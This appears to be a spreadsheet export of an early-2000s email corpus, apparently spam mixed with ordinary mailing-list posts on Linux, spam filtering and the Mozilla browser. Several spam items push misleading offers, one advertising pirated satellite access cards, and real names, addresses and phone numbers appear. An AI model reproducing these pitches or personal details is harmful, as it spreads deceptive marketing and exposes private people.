               size=-1&gt;Had To Collect Child Support?&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt; 
               &lt;LI&gt;&lt;B&gt;&lt;FONT face=Arial,Helvetica&gt;&lt;FONT color=#333300&gt;&lt;FONT 
               size=-1&gt;Prepared A Will or Wanted To?&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt; 
               &lt;/LI&gt;&lt;/UL&gt;&lt;/UL&gt;&lt;/UL&gt;&lt;/UL&gt;
       &lt;BLOCKQUOTE&gt;
         &lt;BLOCKQUOTE&gt;&lt;FONT face=Arial,Helvetica&gt;&lt;FONT color=#000000&gt;&lt;FONT 
           size=-1&gt;You can get all these services handled by some of the best 
           attorneys in the country &lt;U&gt;for only pennies a day&lt;/U&gt;. Why wait until 
           you have a catastrophe and have to pay up the nose at the rate of  
           per hour? Get the same first-rate service from the same top-notched 
           attorneys.&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt; &lt;BR&gt;&lt;FONT face=Arial,Helvetica&gt;&lt;FONT 
           color=#000000&gt;&lt;FONT size=-1&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&amp;nbsp; &lt;BR&gt;&amp;nbsp; 
           &lt;CENTER&gt;
           &lt;TABLE cellSpacing=0 cols=1 cellPadding=0 width="5%" border=1&gt;
             &lt;TBODY&gt;
             &lt;TR&gt;
               &lt;TD&gt;&lt;A 
                 href="http://track.consumerpackage.net/cgi-bin/legal?e=1511722.15"&gt;&lt;IMG 
                 height=28 
                 src="http://image.consumerpackage.net/promotions/legal/clickhere2.gif" 
                 width=99 border=0 
           NOSEND="1"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;FONT 
           face=Arial,Helvetica&gt;&lt;FONT color=#000000&gt;&lt;FONT 
           size=-1&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/BLOCKQUOTE&gt;&lt;/BLOCKQUOTE&gt;
       &lt;CENTER&gt;&lt;B&gt;&lt;FONT face=Arial,Helvetica&gt;&lt;FONT color=#333300&gt;&lt;FONT 
       size=-2&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/CENTER&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;
 &lt;/FONT&gt;&lt;/DIV&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font face=Arial size=1&gt;You received this email because you signed up at one of Consumer Media's websites or you signed up with a party that has contracted with Consumer Media. To unsubscribe from our email newsletter, please visit &lt;a href=http://opt-out.consumerpackage.net/?e=evie@midrange.com&gt;http://opt-out.consumerpackage.net/?e=evie@midrange.com&lt;/a&gt;. &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Office: too painful to watch?
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8428489,215/
 Date: 2002-10-01T11:41:00+01:00
 *Talk:* Join the discussion on the web's liveliest talkboards.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Can I be added to your email distribution lists?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Dell Quinn
 Account Executive
 Fleishman-Hillard Saunders
 15 Fitzwilliam Quay
 Dublin 4
 Ireland
 Tel: 01 6188428
 Fax: 01 6602244
 Mobile: 086 6048101
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Aug 12, 2002 at 08:05:58PM +0100, Nick Murtagh wrote:
 &gt; On Mon, 2002-08-12 at 19:56, Kenn Humborg wrote:
 &gt; &gt; Well, you should consider 'break' inside a 'select' statement
 &gt; &gt; to be part of the syntax, rather than a control flow modifier.
 &gt; 
 &gt; Why? When it comes down to the assembly level, it gets turned
 &gt; into some kind of jump instruction. Should I pretend I don't know
 &gt; this when I'm programming?
 I know that.  And no, you shouldn't.  But see below.
 &gt; &gt; A _mandatory_ part of the syntax, at that.
 &gt; 
 &gt; It's not mandatory. You can leave out the break, and the flow
 &gt; of control will continue to the next case. Which can be useful
 &gt; in certain circumstances.
 I know that, too.
 However, the discussion was tending towards
 "don't use things like goto and break to alter flow of control
 in your program".  While not valid 100% of the time, it's a 
 reasonable rule of thumb.  The idea is that, when looking at
 code, it's easier to see how control moves through a 
 function if your basic control blocks do all the work.  The
 specific example of replacing a break in a while loop with
 a modified while() expression shows this.  You only have to
 look in one place to see when you'll run off the end of the
 loop, not hunt through the whole loop.  (Although that particular
 example wasn't really that good, since the extra test was 
 adding on (... || done) and setting done = true in the loop.
 Which is much the same as a break really.)
 The idea is to surprise the next programmer as little as 
 possible when he sees the code.
 In a similar vein, having a break in every case of a select
 block makes the flow much clearer.  Flow goes in, zero or 
 one case blocks are executed and flows comes out the bottom.
 Leaving out break statements breaks this assumption.
 My point is that, while there are a few situations where it
 makes sense to leave out the breaks, I usually tend to 
 consider the break at the end of each case more like the
 brace at the end of the while block.  
 In fact, maybe it wouldn't have been a bad idea if the language
 was designed such that the continue statement meant fall through
 and break wasn't needed:
    select (x) {
       case 1:
          /* do something - doesn't fall through */
       case 2:
          /* do something - falls through to next case*/
          continue;
       case 3:
          /* do something - doesn't fall through */
       default:
          /* do something - doesn't fall through */
    }
 Still, hindsight and all that.  Sigh.
 Later,
 Kenn
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Virgin's latest airliner.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Forwarded-by: William Knowles &lt;wk@c4i.org&gt;
 http://www.thesun.co.uk/article/0,,2-2002430339,00.html
 By PAUL CROSBIE
 Sep 16, 2002
 VIRGIN'S latest airliner is being revamped after randy passengers
 discovered a tiny cabin was just the place to join the Mile High Club.
 The 130million Airbus 340-600 is fitted with a 5ft x 4ft mother and
 baby room with a plastic table meant for changing nappies.
 But couples keep wrecking it by sneaking in for a quick bonk.
 Virgin has replaced the table several times even though the plane only
 came into service a few weeks ago.
 It is named Claudia Nine after sexy model Claudia Schiffer, 32, who
 launched it in July.
 Now Virgin bosses have asked Airbus to build a stronger table.
 At first, German engineers responsible for the jet's interior were
 baffled by the problem.
 The table is designed to take the weight of a mum and baby.
 One Airbus worker said: "We couldn't work it out. Then the penny
 dropped. It didn't occur to the Germans that this might happen. It
 caused great amusement."
 The firm say the cost of strengthening the tables will be about 200.
 A Virgin spokeswoman said: "Those determined to join the Mile High
 Club will do so despite the lack of comforts.
 "We don't mind couples having a good time but this is not something
 that we would encourage because of air regulations."
 The new Airbus is the world's longest airliner, with teasing slogan
 "Mine is bigger than yours". Virgin is using it on flights to the Far
 East and the US.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed Aug 21 2002 at 15:46, Ulises Ponce wrote:
 &gt; Hi!
 &gt; 
 &gt; Is there a command to insert the signature using a combination of keys and not
 &gt; to have sent the mail to insert it then?
 I simply put it (them) into my (nmh) component files (components,
 replcomps, forwcomps and so on).  That way you get them when you are
 editing your message.  Also, by using comps files for specific
 folders you can alter your .sig per folder (and other tricks).  See
 the docs for (n)mh for all the details.
 There might (must?) also be a way to get sedit to do it, but I've
 been using gvim as my exmh message editor for a long time now.  I
 load it with a command that loads some email-specific settings, eg,
 to "syntax" colour-highlight the headers and quoted parts of an
 email)... it would be possible to map some (vim) keys that would add
 a sig (or even give a selection of sigs to choose from).
 And there are all sorts of ways to have randomly-chosen sigs...
 somewhere at rtfm.mit.edu... ok, here we go:
 rtfm.mit.edu/pub/usenet-by-group/news.answers/signature_finger_faq.
 (Warning... it's old, May 1995).
 &gt; Regards,
 &gt; Ulises
 Hope this helps.
 Cheers
 Tony
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Priceless
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.mozillazine.org/weblogs/hyatt/#85443744
 Date: Not supplied
 I just finished reading an article about Mozilla[1] for Salon.com[2]. This 
 excerpt was rather amusing.
 _It is a good question, because in almost every way, Mozilla is a better 
 browser than Navigator. For example, Netscape's best new feature, tabbed 
 browsing -- which lets you have several Web pages open in the same browser 
 window, and allows you to bookmark all the pages under one name -- was in 
 Mozilla many months ago, and the Mozilla project that created it (called 
 MultiZilla) already has an improved version available. When asked about this, 
 Yecies, of Netscape, said, "That's true, but the engineer who's working on it 
 [for Mozilla] is a Netscape employee. It was always done with the intention of 
 fostering general browsing usability for Netscape." 
 _
 Yes, ok, I suppose that's true if by "Netscape employee" you really meant 
 "Apple employee." and by "always done with the intention of fostering general 
 browsing usability for Netscape" you meant "was done in a weekend for Mozilla 
 because I thought MultiZilla was cool." 
 Here's how the whole tabbed browsing thing happened. One night I finally 
 downloaded an extension called MultiZilla (go check it out on mozdev.org[3]. I 
 was particularly impressed with a feature contained in MultiZilla called tabbed 
 browsing. I started doing research and discovered NetCaptor[4], a tabbed 
 browser that embedded WinIE. 
 MultiZilla was cool but at the time suffered from two fundamental flaws that 
 prevented the code from being incorporated into the Mozilla tree. The first was 
 a UI flaw, namely that at the time it had ripped off NetCaptor down to the last 
 context menu item. The GUI was similar enough that there would have been 
 definite concerns about so obviously copying some of NetCaptor's more obscure 
 capabilities (like sticky names and tab locking). The second concern was that 
 the tab behavior wasn't encapsulated cleanly into a widget. 
 I produced a simplified version of tabbed browsing on my own time (did it in a 
 weekend) that removed some of the geekier NetCaptor features and that 
 encapsulated the tab behavior so that the changes to other Navigator files 
 would be minimal. Once I established that it didn't degrade performance in the 
 single tab case, I checked it in as an experiment.
 The response was overwhelming, as were the bugs that started being filed. So 
 much so that at first I wanted to back tabbed browsing out of the tree. I was 
 overruled by Mozilla, which turned out to be a good thing for all I think. :) 
 Even with all the excitement and hoopla surrounding the advent of tabbed 
 browsing on the engineering side (and in the Mozilla community), Netscape still 
 didn't get it. Netscape marketing prioritized all sorts of useless work that 
 nobody had even started above tabbed browsing in their marketing document. They 
 continued to do so for months, simply not getting it. It was this odd curiosity 
 that one of their engineers had checked in, and they didn't know what to make 
 of it.
 Only after the press raved about it did Netscape really jump on board. I'm sure 
 Netscape is doing the same thing now with popup blocking. Can't you just see it 
 now? We'll have a Popup Manager, and a Manager to manage the Popup Manager, and 
 twenty-seven preferences for fine-grained control of all aspects of popups. 
 Can you believe how disfunctional Netscape is? When their engineers say "you 
 should do this" or "you should do that", they get completely ignored (or blown 
 off), but when CNet says "We didn't like this, or we didn't like that.", 
 Netscape scurries to meet their demands. That is simply pathetic.
 [1] http://archive.salon.com/tech/feature/2002/09/10/browser_wars/
 [2] http://www.salon.com
 [3] http://www.mozdev.org
 [4] http://www.netcaptor.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: $$$$$$For your satellite system$$$$$$ 5283AxpG9-556bGRi3709D-21
</t>
  </si>
  <si>
    <t xml:space="preserve">RECIEVE ALL CHANNELS ON YOUR SATELLITE SYSTEM! 1-888-406-4246
 With our Pre-Programmed Satelite Cards get ALL channels
 availible including ALL Pay-Per-View channels!!
 Never miss any of your favorite shows again!
 Our Pre-Programmed Access Cards work on ALL Satellite Systems!
 Our pre-programmed satellite cards are $329.00 and are
 shipped FedEx 2-Day COD Delivery!
 Comes with a 30-Day Money Back Guarantee, 3 Year Warranty
 and a 24-hour tech support line available!
 Take your old card out, replace it with your new one
 and receive everything available!  It's that easy!
 -------------------------------------------------------------
 Order yours TODAY by calling 1-888-406-4246
 This message will only be sent to you once. 
 You will not receive any future updates.
 Any questions please call 1-888-406-4246.
 4405QbGO0-443kDbe8564dZal0-578oOQX1596BvIM5-482gIom4113Kxl54
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] [OT] GPL &amp; PHP Question
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 20, 2002 at 07:03:17PM +0100, kevin lyda wrote:
 &gt; &gt; &gt; I know this is not strictly a 'Linux' issue but any help would be appreciated
 &gt; &gt; Microsoft has very much made this a Linux issue - it has attempted to imply
 &gt; &gt; that any company using GPL software must make everything it owns public and
 &gt; &gt; it must be true - that nice man from Microsoft wouldn't lie, would he ?
 &gt; 
 &gt; but that's just stupid.  microsoft s/w covers a subset of applications
 You know it's stupid - I know it's stupid. Nonetheless, Microsoft has tried
 to spread FUD about the viral nature of the GPL to make CEO/CIO level people
 (often not the most technically clueful, even the CIOs) fear that if they so
 much as use a Linux box, as, say, a print server, they'll have to make their
 company's entire IP public. (I don't think Microsoft said precisely what I
 jsut said, but that was the tenor of the remarks). And their marketing
 budget is a tad bigger than yours or mine.
 Niall
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Cypriot leaders in last-ditch attempt at unification
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,5,215/
 Date: 2002-10-03T04:21:02+01:00
 *World latest:* The ethnic Greek and Turkish leaders of Cyprus will hold 
 crucial talks today in an effort to reunite the island.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] Head &amp; Rotor VE  07/26
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,  
  *·ͨרҵVEͷ(VEñͷܳ),Ҫͺ
     ʮ4JB1,˹6BT,άµŷ,ʮƤ.....
  * ·ͨжVEͷľ, Ϊͱ
    ҵרҵ,ʱ̸ٹʸȼϵͳ
    ̵,ҲչȽļӹ,Թ.Ʒ
    ͬͬƷ൱. 
  * ǵĲƷȤ,֪ͨ.
    we have been in the field of diesel fuel injection 
 systems for quite a few years.(CHINA)
    We tell you that we will update our VE h&amp;r
 (hydraulic heads for the VE distributor pump) list in our 
 homepages.Thirty more models will be added.And the minimum
 order will be 6pcs a model.We quote them as follows:
 3-cyl:USD:50/1pcs
 4-cyl:USD:50/1pcs
 5-cyl:USD:55/1pcs
 6-cyl:USD:55/1pcs
    We can ship the following three models to you within 8~10 weeks. after
 we receive your payment.
   If you feel interested in our products,please advise the details about 
 what you need,such model name,part number,quantity and so on.We are always
 within your touch.
   Looking forward to our favorable cooperation.
   Hope to hear from you soon.
 (NIPPON DENSO)
 096400-0920
 096400-0143
 096400-0242
 096400-0371
 096400-0432
 096400-1030
 096400-1210
 096400-1230
 096400-1240   
 096400-1250
 096400-1330
 096400-1331
 096400-1600
 096540-0080
 (ZEXEL)
 146400-8821
 145400-3320
 146400-4520
 146400-8821
 146400-9720
 146401-0520
 146401-2120
 146402-0820
 146402-0920
 146403-2820
 146402-3820
 146402-4020
 146402-4320
 146403-3120
 146403-3520
 146404-1520
 146404-2200
 146430-1420
 (BOSCH) 
 1 468 333 320
 1 468 333 323
 1 468 334 313
 1 468 334 327
 1 468 334 337
 1 468 334 378
 1 468 334 475
 1 468 334 496
 1 468 334 565
 1 468 334 575
 1 468 334 580
 1 468 334 590
 1 468 334 594
 1 468 334 595
 1 468 334 596
 1 468 334 603
 1 468 334 604
 1 468 334 606
 1 468 334 666
 1 468 334 675
 1 468 334 720
 1 468 334 780
 1 468 334 798
 1 468 334 874
 1 468 334 899
 1 468 334 946
 2 468 334 021
 2 468 334 050
 2 468 335 022
 1 468 335 345
 2 468 336 013
 1 468 336 352
 1 468 336 364
 1 468 336 371
 1 468 336 403
 1 468 336 418
 1 468 336 423
 1 468 336 464
 1 468 336 480
 1 468 336 614
 1 468 336 626
                                     C.Hua
 Sales &amp; purchasing director
 http://WWW.China-LuTon.com 
 china_lutong@163.com
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Monday, September 23, 2002, at 03:25 PM, R. A. Hettinga wrote:
 &gt;          Green = Red.
 		Capitalist = Nazi.
 		Information content of the above statements === 0.
 Meanwhile, the angels of light (tm) are having a great knock-down 
 drag-out with the eldrich kings of .NET on XML-DEV.
 -- whump
 ----
 Bill Humphries &lt;bill@whump.com&gt;
 http://www.whump.com/moreLikeThis/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Expand Your business with our Money!
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00C6_24D75C3A.C0588C07
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 bG92ZQ0KV29ybGQgQ2FwaXRhbCBHcm91cCBpcyBhIGdyb3VwIG9mIEZ1bmRp
 bmcgU291cmNlcyB0aGF0IGhlbHAgYnVzaW5lc3NlcyANCndpdGggdGhlaXIg
 ZmluYW5jaWFsIG5lZWRzLiAgV2UgY2FuIHByb3ZpZGUgV29ya2luZyBDYXBp
 dGFsIHRvICQxNTAsMDAwIA0Kb24gYW4gdW5zZWN1cmVkIGJhc2lzOyB3aGlj
 aCBjYW4gYmUgdXNlZCB0byB0YWtlIGNhcmUgb2YgY2FzaCBmbG93IA0KbmVl
 ZHMsIHByb3ZpZGUgZnVuZHMgZm9yIGV4cGFuc2lvbiBhbmQgb3RoZXIgbmVl
 ZHMgeW91ciBidXNpbmVzcyBoYXMgKFVTIA0KYnVzaW5lc3NlcyBvbmx5KS4g
 IFdlIGFsc28gcHVyY2hhc2UgSW52b2ljZXMsIEFjY291bnRzIFJlY2VpdmFi
 bGVzLCANCkxlYXNlcywgQXV0byBQb3J0Zm9saW9zLCBCdXNpbmVzcyBhbmQg
 UmVhbCBFc3RhdGUgTm90ZXMsIGFuZCBvdGhlciBDYXNoIA0KRmxvd3MuICBJ
 ZiB5b3Ugd291bGQgbGlrZSB0byBpbnF1aXJlIGFib3V0IHVzIGhlbHBpbmcg
 eW91IHRvZGF5IHdpdGggeW91ciANCmNhcGl0YWwgbmVlZHMsIHBsZWFzZSBj
 bGljayBvbiB0aGUgbGluayBiZWxvdyBmb3IgZGV0YWlscyBhbmQgc3VibWlz
 c2lvbiANCmZvcm0uICBUaHggZm9yIHlvdXIgdGltZS4gIFdvcmxkIENhcGl0
 YWwgR3JvdXANCg0KaHR0cDovL3d3dy5tYWlscGFpbC5jb20NCg0KaHR0cDov
 L3d3dy5tYWlscGFpbC5jb20NCg0KDQoNCg0KDQoNCg0KDQoNCmxvdmUNCg0K
 DQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoN
 Cg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0K
 DQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KbG92ZQ0KDQpZb3UgYXJlIHJlY2ll
 dmluZyB0aGlzIGVtYWlsIGFzIGEgc3Vic2NyaWJlciBvciBhZmZpbGlhdGUg
 c3VjYnNjcmliZXIgDQp0byBvcHRpbiBuZXR3b3JrLiAgSWYgeW91IGhhdmUg
 cmVjZWl2ZWQgdGhpcyBhcyBhbiBlcnJvciBvciB3b3VsZCBsaWtlIA0KdG8g
 YmUgdGFrZW4gb2ZmIG91ciBsaXN0IHBsZWFzZSBzZW5kIGFuIGVtYWlsIHRv
 IG5vcm1vcmVAZXlvdS5jb20uICBUaGFuayANCnlvdSBhbmQgaGF2ZSBhIGdy
 ZWF0IGRheS5sb3ZlDQowOTgxWFZLVjktMTE1eWFMbDkzMDlRUGFsMjM=
</t>
  </si>
  <si>
    <t xml:space="preserve">"Hunt, Bryan" stated the following:
 &gt; 
 &gt; you need to do a "fdisk /mbr" from a bootable windoze floppy
 &gt; alternatively boot from linux boot disk and do fdisk, delete all partitions.
 I need to ask a question concerning this issue.
 What if I don't want to get rid of the MBR -- it will destroy the OS
 on that drive.  How do I remove lilo without the above fdisk
 procedure?
 &gt; -----Original Message-----
 &gt; From: jac1 [mailto:jac1@student.cs.ucc.ie]
 &gt; 
 &gt; i recently had to wipe linux from my pc but forgot to restore the original
 &gt; MBR (NT). Anyone know how i can do this? linux is entirely gone and no boot
 &gt; floppy. formatting the entire disk doesn't do it either.
 -- 
 Note: When you reply to this message, please include the mailing
       list/newsgroup address and my email address in To:.
 *********************************************************************
 Signed,
 SoloCDM
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re[2]: [Razor-users] Reducing impact from tons of email
</t>
  </si>
  <si>
    <t xml:space="preserve">On Aug 25 Joe Berry wrote:
 &gt;Very good advice given above.
 Yes :)
 &gt;One more problem solved.
 No. One more problem in some software worked around by using tricks in 
 another piece of software. The solution is the aggregator.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</si>
  <si>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[Skip Montanaro]
 &gt; Because I get mail through several different email addresses, I
 &gt; frequently get duplicates (or triplicates or more-plicates) of
 &gt; various spam messages.  In saving spam for later analysis I haven't
 &gt; always been careful to avoid saving such duplicates.
 &gt;
 &gt; I wrote a script some time ago to try an minimize the duplicates I see
 &gt; by calculating a loose checksum, but I still have some duplicates.
 &gt; Should I delete the duplicates before training or not?
 People just can't stop thinking &lt;wink&gt;.  The classifier should work best
 when trained on a wholly random spattering of real life.  If real life
 contains duplicates, then that's what the classifier should see.
 &gt; Would people be interested in the script?  I'd be happy to extricate
 &gt; it from my local modules and check it into CVS.
 Sure!  I think it's relevant, but maybe for another purpose.  Paul Svensson
 is thinking harder about real people &lt;wink&gt; than the rest of us, and he may
 be able to get use out of approaches that identify closely related spam.
 For example, some amount of spam is going to end up in the ham training data
 in real life use, and any sort of similarity score to a piece of known spam
 may be an aid in finding and purging it.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: YOUR ACCOUNT HAS BEEN CLOSED!
</t>
  </si>
  <si>
    <t xml:space="preserve">You have been removed from our list.
 You will NOT be able to recieve todays picks in the email
 You will NOT be notified of any new sports pick websites.
 IF YOU HAVE QUESTIONS ABOUT WHY YOUR ACCOUNT IS EXPIRED,
 YOUR ACCOUNT WAS CLOSED FOR ONE OF THE FOLLOWING REASONS. 
 1. YOU FAILED TO LOG INTO YOUR ACCCOUNT FOR OVER A MONTH. 
 2. YOUR ACCOUNT WAS FOUND ON A SPAM LIST AND REJECTED. 
 3. THE GIFT ACCOUNT SOMEONE SIGNED YOU UP FOR EXPIRED.
 If you wish to rejoin please go to the following url:
 http://www.freewebs.com/registar/
 YOU DO NOT NEED TO DO ANYTHING TO BE REMOVED FROM THIS eMAIL LIST.
 THIS IS A ONE TIME MAILING TO NOTIFY YOU THAT, YOU ARE REMOVED.
 However, you may reply with the word "remove" in the subject line
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: /home/dude
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Axel wrote :
 &gt; I am now relaxed again ;), and pass this info on. Probably Matthias Saou
 &gt; himself is "dude", and some package has hardwired a path in his build
 &gt; directory. It would be nice to find out which and fix it, but I am using
 &gt; too many of the freshrpm suite to narrow it down.
 Indeed, my usual login is "dude" (and has been since long before "The Big
 Lebowsky" came out ;-)), and it seems the some programs wrongly hard code
 my home directory when being compiled :-(
 For instance :
 [dude@python dude]$ strings /usr/bin/gentoo | grep dude
 /home/dude/
 [dude@python dude]$ strings /usr/bin/xine | grep dude
 /home/dude/redhat/tmp/xine-root/usr/share/locale
 These should probably be considered bugs in the program's build process
 (especially for xine, look at that!), I'll report them upstream if/when I
 have some time.
 Thanks for noticing this!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</si>
  <si>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[Razor-users] Problem with SDK 2.03?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I recently brought up a new system - SuSe 7.3 and I am running
 spamassassin and procmail, which work fine.
 I tried bringing up razor (2.14) but I am not able to get the SDK to
 install and razor reports missing modules. They appear to be there. I
 followed the installation directions. There appears to be an endless list
 of errors. Any ideas on what to do or where to start?
 Doug
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: WARNING. Mail Delayed: Re: [SAtalk] [OT] Perl problem and 2.40
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --_===6628399====mx1.yipes.com===_
 Content-Type: text/plain
 This is a warning message only.
   Your message remains in the server queue,
   the server will try to send it again.
   You should not try to resend your message now.
 Message delivery to 'casimir@tgsnopec.com' delayed
 SMTP module(domain tgsnopec.com) reports:
  relay.tgsnopec.com: no response
 --_===6628399====mx1.yipes.com===_
 Content-Type: message/delivery-status
 Reporting-MTA: dns; mx1.yipes.com
 Original-Recipient: rfc822;casimir@tgsnopec.com
 Final-Recipient: rfc822;casimir@tgsnopec.com
 Action: delayed
 Status: 4.0.0
 --_===6628399====mx1.yipes.com===_
 Content-Type: text/rfc822-headers
 Received: from [216.136.171.252] (HELO usw-sf-list2.sourceforge.net)
   by mx1.yipes.com (CommuniGate Pro SMTP 3.5.1)
   with ESMTP-TLS id 6627220 for casimir@tgsnopec.com; Thu, 05 Sep 2002 01:35:26 -0700
 Received: from usw-sf-list1-b.sourceforge.net ([10.3.1.13] helo=usw-sf-list1.sourceforge.net)
 	by usw-sf-list2.sourceforge.net with esmtp (Exim 3.31-VA-mm2 #1 (Debian))
 	id 17mryq-0000eK-00; Thu, 05 Sep 2002 01:27:12 -0700
 Received: from hippo.star.co.uk ([195.216.14.9])
 	by usw-sf-list1.sourceforge.net with smtp (Exim 3.31-VA-mm2 #1 (Debian))
 	id 17mryb-000529-00
 	for &lt;spamassassin-talk@lists.sourceforge.net&gt;; Thu, 05 Sep 2002 01:26:58 -0700
 Received: from MATT_LINUX by hippo.star.co.uk
           via smtpd (for usw-sf-lists.sourceforge.net [216.136.171.198]) with SMTP; 5 Sep 2002 08:17:57 UT
 Received: (qmail 28723 invoked from network); 3 Sep 2002 08:22:05 -0000
 Received: from unknown (HELO startechgroup.co.uk) (10.2.100.178)
   by matt?dev.int.star.co.uk with SMTP; 3 Sep 2002 08:22:05 -0000
 Message-ID: &lt;3D77146F.1000603@startechgroup.co.uk&gt;
 From: Matt Sergeant &lt;msergeant@startechgroup.co.uk&gt;
 User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020901
 X-Accept-Language: en-us, en
 MIME-Version: 1.0
 To: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;
 CC: Justin Mason &lt;yyyy@example.com&gt;, 
  spamassassin-talk@lists.sourceforge.net
 Subject: Re: [SAtalk] [OT] Perl problem and 2.40 released
 References: &lt;D79A56AD131896448D0860DEE07CBE1FE1DE@med-core07.med.wayne.edu&gt;
 Content-Type: text/plain; charset=us-ascii; format=flowed
 Content-Transfer-Encoding: 7bit
 Sender: spamassassin-talk-admin@example.sourceforge.net
 Errors-To: spamassassin-talk-admin@example.sourceforge.net
 X-BeenThere: spamassassin-talk@example.sourceforge.net
 X-Mailman-Version: 2.0.9-sf.net
 Precedence: bulk
 List-Help: &lt;mailto:spamassassin-talk-request@example.sourceforge.net?subject=help&gt;
 List-Post: &lt;mailto:spamassassin-talk@example.sourceforge.net&gt;
 List-Subscribe: &lt;https://example.sourceforge.net/lists/listinfo/spamassassin-talk&gt;,
 	&lt;mailto:spamassassin-talk-request@lists.sourceforge.net?subject=subscribe&gt;
 List-Id: Talk about SpamAssassin &lt;spamassassin-talk.example.sourceforge.net&gt;
 List-Unsubscribe: &lt;https://example.sourceforge.net/lists/listinfo/spamassassin-talk&gt;,
 	&lt;mailto:spamassassin-talk-request@lists.sourceforge.net?subject=unsubscribe&gt;
 List-Archive: &lt;http://www.geocrawler.com/redir-sf.php3?list=spamassassin-talk&gt;
 X-Original-Date: Thu, 05 Sep 2002 09:23:11 +0100
 Date: Thu, 05 Sep 2002 09:23:11 +0100
 --_===6628399====mx1.yipes.com===_--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: http://www.efi.ie/
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format
 --=_NextPart_2rfkindysadvnqw3nerasdf
 Content-Type: text/plain
 Content-Transfer-Encoding: quoted-printable
 www.EasyAdPost.com --
 Promote your Products and Services on Thousands of Classified Sites.
 Simply the Best Way to Sell on the Internet=21=20
 No time to post an ad for your business?
 Struggling with numerous classified sites?
 Seeking effective means to promote your business?=20
 All of these are great reasons for you to visit EasyAdPost.com. Currently EasyAdPost.com boasts a database of 120,000+ popular classified sites, to which we will submit your classified ad quickly and effectively. We will as well submit your business site URL or Logo URL to hundreds of thousands of search engines and directories worldwide. Quickly and effectively, EasyAdPost.com will attract potentially millions of people to your business on the Internet, without any hidden cost for advertising=21
 Visit Links below for More Details
 ***********************************************
 To learn the generals about EasyAdPost, view http://www.easyadpost.com
 To browse the sample list of classified sites, go to http://www.easyadpost.com/sample.php=20
 Questions or comments? Post your Query Form to us at http://www.easyadpost.com/aboutus.php=20
 ***********************************************
 Spend your market dollar wisely and good luck to your business=21
 Peterson Slade
 customer=40easyadpost.com
 EasyAdPost.com
 --=_NextPart_2rfkindysadvnqw3nerasdf
